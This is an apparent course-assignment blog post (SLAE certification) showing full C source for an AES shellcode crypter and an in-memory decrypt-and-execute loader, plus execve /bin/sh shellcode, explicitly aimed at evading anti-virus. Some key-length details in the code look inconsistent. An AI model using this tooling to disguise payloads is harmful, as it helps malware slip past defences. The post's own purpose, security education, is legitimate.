<!DOCTYPE html>
<html lang="en">

<head><meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link href="https://fonts.googleapis.com/css?family=Merriweather:300|Raleway:400,700" rel="stylesheet">
<link rel="stylesheet" href="/assets/css/style.css">
<title>CUSTOM_CRYPTER – LINUX/X86</title>
<!-- Begin Jekyll SEO tag v2.6.1 -->
<title>CUSTOM_CRYPTER – LINUX/X86 | IAMROOT</title>
<meta name="generator" content="Jekyll v4.1.1" />
<meta property="og:title" content="CUSTOM_CRYPTER – LINUX/X86" />
<meta name="author" content="Kartik Durg" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Writing crypter’s using Libgcrypt." />
<meta property="og:description" content="Writing crypter’s using Libgcrypt." />
<link rel="canonical" href="http://localhost:4000/2018/10/09/0x7-custom-crypter-linux-x86.html" />
<meta property="og:url" content="http://localhost:4000/2018/10/09/0x7-custom-crypter-linux-x86.html" />
<meta property="og:site_name" content="IAMROOT" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2018-10-09T00:00:00+05:30" />
<script type="application/ld+json">
{"mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2018/10/09/0x7-custom-crypter-linux-x86.html"},"author":{"@type":"Person","name":"Kartik Durg"},"description":"Writing crypter’s using Libgcrypt.","headline":"CUSTOM_CRYPTER – LINUX/X86","dateModified":"2018-10-09T00:00:00+05:30","datePublished":"2018-10-09T00:00:00+05:30","@type":"BlogPosting","url":"http://localhost:4000/2018/10/09/0x7-custom-crypter-linux-x86.html","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


<head>

</head></head>

<body>
  <main class="container">
    <section class="about">
      <a href="/"><img src="/assets/portfolio.jpg" alt="Kartik Durg"></a>
      <h2 id="title">
        <a href="/">Kartik Durg</a>
      </h2>
      <p class="tagline">Red Team Research @McAfee</p>
      <ul class="social"><a href="https://github.com/kartikdurg" target="_blank">
          <li>
            <i class="icon-github-circled"></i>
          </li>
        </a><a href="https://www.linkedin.com/in/kartikdurg" target="_blank">
          <li>
            <i class="icon-linkedin-squared"></i>
          </li>
        </a><a href="https://twitter.com/kartikdurg" target="_blank">
          <li>
            <i class="icon-twitter-squared"></i>
          </li>
        </a></ul><nav class="navigation">
        <ul>
          
          <li>
            <a href="/index.html">Home</a>
          </li>
          
        </ul>
      </nav><p>&copy;
        2020</p><div>
        <p>Dark Mode
          <i class="icon-moon"></i>
          <label class="switch">
            <input type="checkbox" id="dark-mode-toggle">
            <span class="slider round" onclick="toggleDarkMode()"></span>
          </label>
        </p>
      </div>
      <script type="text/javascript" src="/assets/js/darkmode.js"></script></section>
    <section class="content">
      <div class="post-container">
  <a class="post-link" href="/2018/10/09/0x7-custom-crypter-linux-x86.html">
    <h2 class="post-title">CUSTOM_CRYPTER – LINUX/X86</h2>
  </a>
  <div class="post-meta">
    <div class="post-date"><i class="icon-calendar"></i>Oct 9, 2018</div></div>
  <div class="post">
    <p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification</p>
<ul>
  <li>Student ID: SLAE-1233</li>
  <li>Assignment: 7</li>
  <li>Github: <a href="https://github.com/kartikdurg">Kartik Durg</a></li>
</ul>

<hr />

<p>In this post we will aim to create a custom shellcode crypter. This crypter program will encrypt our shellcode and then execute it after successful decryption at runtime, in order to bypass anti-virus and defeat reverse engineering analysis.</p>

<p>References:</p>

<ul>
  <li><a href="https://en.wikipedia.org/wiki/Advanced_Encryption_Standard">Advanced Encryption Standard</a></li>
  <li><a href="https://www.gnupg.org/software/libgcrypt/index.html">Libgcrypt</a></li>
  <li><a href="https://www.gnupg.org/documentation/manuals/gcrypt.pdf">The Libgcrypt Reference Manual</a></li>
</ul>

<p>For this post I decided to use C language, to encrypt/decrypt our shellcode using advanced encryption standard with 256-bits which wouldn’t be so easy without “Libgcrypt”.</p>

<p>“Libgcrypt” is basically a cryptographic library that provides methods to all cryptographic building blocks. For example: AES, Camellia, CAST5, ChaCha20,etc…</p>

<p>The C code below represents the usage of Libgcrypt library for our shellcode encryption:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;
#include &lt;gcrypt.h&gt;

//Hardcoded password
const char *key = "iamjboyy";
//Setup IV
uint8_t iv[16] = {0x05};

uint8_t shellcode[] = &lt;"YOUR_SHELLCODE_HERE&gt;";

int main(){

int i, cipher = gcry_cipher_map_name("aes256");
size_t len = strlen(shellcode);
uint8_t *encrypt = malloc(len);

gcry_cipher_hd_t hd;
//Open cipher
gcry_cipher_open(&amp;hd, cipher, GCRY_CIPHER_MODE_OFB, 0);
//Set key for cipher
gcry_cipher_setkey(hd, key, 16);
//Set iv
gcry_cipher_setiv(hd, iv, 16);
//Encrypt
gcry_cipher_encrypt(hd, encrypt, len, shellcode, len);

printf("Encrypted shellcode: \n");
for(i=0; i&lt;len; i++){
printf("\\x%02x", encrypt[i]);
}
printf("\n");

return 0;
}
</code></pre></div></div>

<p>Now, lets make use of “exceve-stack” shellcode  and then encrypt the same using our crypter:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>==&gt; execve-stack:
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
</code></pre></div></div>

<p>Compiling the code:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc encrypt_shellcode.c -o encrypt_shellcode -lgcrypt -fno-stack-protector -z execstack
</code></pre></div></div>

<p>Once executed it encrypts the above generated shellcode as below:</p>

<p><img src="/media/7-crypter-1.jpg" alt="" /></p>

<hr />

<p>Now that we have an encrypted shellcode, lets decrypt and execute it using the below C code:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;
#include &lt;gcrypt.h&gt;

//Hardcoded password
const char *key = "iamjboyy";
//Setup IV
uint8_t iv[16] = {0x05};


uint8_t shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

uint8_t encryptedshellcode[] = "\x3f\x60\xc7\xf5\xc3\x39\xc8\x42\x7e\x65\xc2\x40\xf3\x5c\xfc\x46\x15\x50\x2b\xc0\x9e\xde\xcf\xa5\xef";

int main(){

    int i, cipher = gcry_cipher_map_name("aes256");
    size_t len = strlen(shellcode);
    uint8_t *decrypt = malloc(len);

    gcry_cipher_hd_t hd;
    //Open cipher
    gcry_cipher_open(&amp;hd, cipher, GCRY_CIPHER_MODE_OFB, 0);
    //Set key for cipher
    gcry_cipher_setkey(hd, key, 16);
    //Set iv
    gcry_cipher_setiv(hd, iv, 16);
    //Decrypt
    gcry_cipher_decrypt(hd, decrypt, len, encryptedshellcode, len);
    
    int (*ret)() = (int(*)())decrypt;
    printf("Running shellcode...\n");
    ret();
	
    gcry_cipher_close(hd);
    free(decrypt);
    return 0;
}
</code></pre></div></div>

<p>Compiling and executing the shellcode:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc decrypt_shellcode.c -o decrypt_shellcode -lgcrypt -fno-stack-protector -z execstack
</code></pre></div></div>

<p><img src="/media/7-crypter-2.jpg" alt="" /></p>

<p>As noticed, our shellcode was well decrypted and executed.</p>

<hr />

<p><a href="https://github.com/kartikdurg/SLAE/tree/master/Assignment_0x7">https://github.com/kartikdurg/SLAE/tree/master/Assignment_0x7</a></p>

<p>Thank you for reading 🙂</p>

<p>– Kartik Durg</p>

  </div><div id="disqus_thread" style="margin-top:25px"></div>
  <script>
    var disqus_config = function () {
      this.page.url = 'http://localhost:4000/2018/10/09/0x7-custom-crypter-linux-x86.html';
      this.page.identifier = 'http://localhost:4000/2018/10/09/0x7-custom-crypter-linux-x86.html';
    };
    (function () {
      var d = document, s = d.createElement('script');
      s.src = 'https://redteam.disqus.com/embed.js';
      s.setAttribute('data-timestamp', +new Date());
      (d.head || d.body).appendChild(s);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments
      powered by Disqus.</a></noscript></div>

    </section>
  </main><script async src="https://www.googletagmanager.com/gtag/js?id=UA-176694116-1"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag() { dataLayer.push(arguments); }
    gtag('js', new Date());
    gtag('config', 'UA-176694116-1');
  </script>
  <script src="/assets/js/simple-jekyll-search.min.js"></script>
  <script src="/assets/js/search.js"></script>
  
</body>

</html>
